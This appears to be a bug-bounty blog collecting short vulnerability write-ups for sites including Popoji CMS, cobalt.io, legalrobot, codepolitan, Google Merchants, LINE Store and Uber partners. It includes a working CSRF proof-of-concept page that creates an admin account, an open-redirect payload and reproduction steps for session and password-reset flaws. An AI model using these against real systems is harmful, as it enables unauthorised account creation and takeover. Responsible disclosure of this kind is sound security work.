Posts

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th

Session not expired when password has been changed [app.cobalt.io]

Image
Session not expired when password has been changed on app.cobalt.io Description When user change password from another platform, the previous platform still connect to account and still can edit the profile. POC : 1. Login on mozilla, 2. Login on Chrome, 3. change the password on chrome. 4. back to mozilla, you still able to access the account 5. you still can edit profile. Video :  https://youtu.be/Cz2zh7w4n6M (unlisted ) Bounty : Note : I ask permission to app.cobalt.io to write it on my blog, and them give me the permission, so I write here, Hope you enjoy~

Password Reset Token Issue [app.legalrobot.com]

Image
Password Reset Token Issue [app.legalrobot.com] Summary Can still change password without token Step to Reproduce Request for password reset link. Go to email and click on password reset link https://app.legalrobot.com/password-reset/token?v=uWe_yFJS0-N9fIk0nG0b0NZ70lkwNNi7RdUZu0KhiaX Now remove the token and use the link https://app.legalrobot.com/password-reset Observe that able to reset the password without the token. Fix : Always password reset link should work with a valid token. Reference : https://hackerone.com/reports/253934 At first time my report got N/A and I explain little bit and get bounty 20$ yay, you can see my original report on https://hackerone.com/reports/265775 Thanks,

Open Redirect On Codepolitan.com

Image
Open Redirect On Codepolitan.com Description :  Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. Impact : Force user go to untrusted website from codepolitan website Location of bug :  https://www.codepolitan.com/users/login?callback= Payload : http://attacker.com Reproduce : 1. Open https://www.codepolitan.

Mixed content when logout On [merchants.google.com] - Duplicate

Image
Summary:  Mixed content when logout merchants.google.com , mixed content load when user logout from https://merchants.google.com/ and redirect to http://www.google.co.id/accounts/Logout2?ilo=1&ils=s.ID&ilc=0&continue=https://merchants.google.com/mc&zx=-2055164642 Steps to reproduce: 1. Sign in to https://merchants.google.com/ 2. and then logout 3. load mixed content to http://www.google.co.id/accounts/Logout2?ilo=1&ils=s.ID&ilc=0&continue=https://merchants.google.com/mc&zx=-2055164642 Browser/OS: Mozilla Video : https://youtu.be/85BtW_4PVzQ ( unlisted) Picture : Timeline :  Google confirming it but this is duplicate. maybe next time got the bounty :D , wish me luck !

[store.line.me] Still can change wishlist URL although wishlist is set to private

Image
Summary Still can change wishlist URL although wishlist set to private, in conditional, when URL set to private, user can't change wishlist URL, but i found how to change URL although user set wishlist URL to Private Step To Reproduce :  1. login to store.line.me 2. go to wishlist -> setting, 3. turn on burp suite -> catch request when change url 4. set wishlist to private again. 5. and replay the request from step 3, This is not eligibly for bounty, although line side it's say this is bug, but not security bug. This mean, i need to try learn more and more. hehehe, wish me luck. Video : https://youtu.be/gyp3T7Cnw5c

Session not expired When logout [partners.uber.com]

Image
It's funny, when i can reproduce it 4 days ago and make some video, the team said we’re unable to reproduce this issue following the steps you provided. it's i copy - paste with my report on hackerone   Hi, Summary partners.uber.com website is not expiring the user's session immediately after logout. when user logout, the session not expired, and still can send request and the server respond response with OKAY Steps to Reproduce: Log into the website - partners.uber.com Capture any request. For ex, profile edit page using burp proxy. Logout from the website. Replay the request captured in step 2 and notice it displays the proper response. Thanks, the team it's fixed this issue, and say this is was unvalidated issue.but the team won't to disclose report, finally after few roast, team agree to disclose. i try to contact hackerone team with support, because when i want to call hackerone team to my report, there's no option on my report. Last